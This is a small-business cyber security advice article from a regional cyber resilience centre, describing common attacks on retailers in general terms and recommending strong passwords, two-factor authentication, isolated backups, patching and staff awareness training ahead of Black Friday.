5 ways SMEs can protect their retail and online stores ahead of Black Friday

In the last 12 months, 1 in 8 retailers faced a cyber-attack according to data published in a report by financial auditor, Grant Thornton’s.


One of the reasons why cyber criminals take an interest in the retail sector is due to the level of customer data that is collected, particularly through ecommerce and online shopping platforms.


In 2018, fashion retailer SHEIN suffered a data breach that affected in the region of 6.42 million customers. Cyber criminals were able to gain access to the company’s servers and steal the personal information of SHEIN’s customers.


No retail business is too small or too large to consider cyber security, whether you have 10 customers or 10,000, the information you retain on them is still of huge value to cyber criminals.


Why are retail and ecommerce businesses of interest?

Recent research by PwC on their client base revealed that cyber-attacks on their retail clients had increased by over 30%, demonstrating that the retail and ecommerce industry is of interest to cyber criminals.


Within only a few months, the pandemic accelerated the shift to ecommerce/online stores by five years, meaning there is now more public and private data stored in the cloud than ever before.


In the two years from March 2019 to March 2021, there was an 8% increase in the opening of retail businesses. And, with 98% of UK businesses now operational online in one way or another, benefiting hugely from the use of websites, social media, staff email addresses, online banking, and the ability for customers to shop online, it is no surprise that cybercrime is on the up.


What type of attacks are retail and ecommerce businesses facing?

Attacks on web applications such as a company’s online payment system are reportedly (Verizon 2019 Data Breach Investigations Report) the most common type of attack for retail companies to suffer. This is where attacks will attempt to breach the payment system and then install some malicious code that will steal credit card details of the companies’ clients. This stolen data is often then sold on to other cyber criminals for a profit.


Another popular type of cyber-attack on both the retail industry and food and beverage industry is point-of-sale (POS) cyber-attacks. Point-of-sale breaches are among the most common methods of attack for these industries. These attacks take place when malicious malware is installed on systems used to conduct financial transactions. The malware is designed to steal customer payment data, particularly credit card data from checkout systems.


Retail and ecommerce businesses are also facing cyber-attacks via their companies’ websites. These attacks often see websites go offline which will result in a loss of sales and frustrated customers. Another way in which they will attack a website is through a distributed denial-of service attack, which is an attempt to overwhelm an ecommerce platform with things like fake online orders and spam customer service inquiries.


Five top tips

Retailers should take a deep look at their cyber security to understand the risks associated with running a retail or ecommerce store. To help, we’ve created five top tips for you to take to help protect your business from a cyber-attack. Use strong passwords and store them securely Passwords are you first level of protection when it comes to securing your online accounts or customer data. Complex passwords can often be difficult to remember, which often leads to people choosing weaker passwords or repeating them across multiple accounts. The National Cyber Security Centre (NCSC) encourages businesses to use three random words, such as HouseForestFlower to help protect against common issues like Brute Force attacks. This is where an attacker tries many passwords with the hope of guessing it correctly.

The aim is not to make it so complicated that you won’t remember it, but hard enough for cybercriminals to struggle to crack. Another tip is to include symbols, capital letters and numbers to make it even more secure.

Default passwords must always be changed to something unique; passwords should also be changed if you witness any suspicious activity taking place on the account.


To help you keep track of all your passwords, you could use a Password Manager. This can be used on a phone, tablet or computer and stores multiple passwords securely.


Double up your cyber protection

Two factor authentication otherwise known as 2fa, two-step verification or multi-factor authentication was designed to help stop cyber criminals accessing your accounts even if they obtain your passwords.


Two-factor authentication (2fa) ensures that any new device trying to log in or make account changes needs a second layer of security before access is given. Some common methods of 2FA include a single use code being sent via SMS, email, phone, or smartphone application.


Below are instructions on how to turn on 2FA for the most common email systems and for four popular social media channels:



Regularly backup your data and isolate it Think about how much you rely on your business-critical data, such as customer details, quotes, orders, payment details or coursework/examination files for education establishments. Now imagine how long you would be able to operate without them.


All businesses, regardless of size and type, should take regular backups of their important data, and make sure that these backups are recent, tested so you are confident they can be restored.

Ransomware (and other malware) can often move to attached storage automatically, which means any such backup could also be infected, leaving you with no backup to recover from. To help keep your files and data safe, you should secure digital backups with a password or encryption and keep them isolated from their associated network.


By doing this, you're ensuring your business can still function following the impact of flood, fire, physical damage, or theft. Furthermore, if you have backups of your data that you can quickly recover, you can't be blackmailed by ransomware attacks.


Don’t hate the update

Every piece of software your business uses whether this be payment transaction software or a digital stock management system, offers the potential for unauthorised access and exploitation.


If your business runs as a result of being connected to the internet, you must keep computers, devices, applications, and software patched and up to date, and where you can, add the use of two-factor authentication with strong passwords.


Regularly patching and installing software updates helps to protect your devices as the updates will expose new flaws and vulnerabilities. Cyber criminals use these flaws and vulnerabilities to attack your devices and steal your identity. Software and app updates are designed to fix these weaknesses and installing them as soon as possible will keep your devices secure.


When setting up new devices you should also remove any unnecessary pre-installed software, while ensuring that they have firewall protection enabled and are running up-to-date anti-virus software.


Here is a short video of helpful tips for software updates and patching



Pay attention to detail Human error is one of the main contributing factors to the majority of cyber security breaches, in fact its reported that 95% of cyber security breaches are primarily caused by human error.


Whilst people can often be the weakest link in the chain, if educated they can become your strongest asset in protecting your business. Cybercriminals will try to lure in your employees through a tactic known as Social Engineering. This is when a person is led into taking an action such as clicking on an infected link in an email or opening the infected email itself (a phishing email).


The key to security awareness training is to equip all your employees with a level of awareness to combat these threats. Employees need to be taught what clues to look for that indicate threats, and how to respond when they see them.


Discover how our security awareness training could help your business here.


The contents of this website are provided for general information only and are not intended to replace specific professional advice relevant to your situation. The intention of The Cyber Resilience Centre for the South East is to encourage cyber resilience by raising issues and disseminating information on the experiences and initiatives of others. Articles on the website cannot by their nature be comprehensive and may not reflect most recent legislation, practice, or application to your circumstances. The Cyber Resilience Centre for the South East provides affordable services and Trusted Partners if you need specific support. For specific questions please contact us.

The Cyber Resilience Centre for the South East does not accept any responsibility for any loss which may arise from reliance on information or materials published on this document. The Cyber Resilience Centre for the South East is not responsible for the content of external internet sites that link to this site or which are linked from it.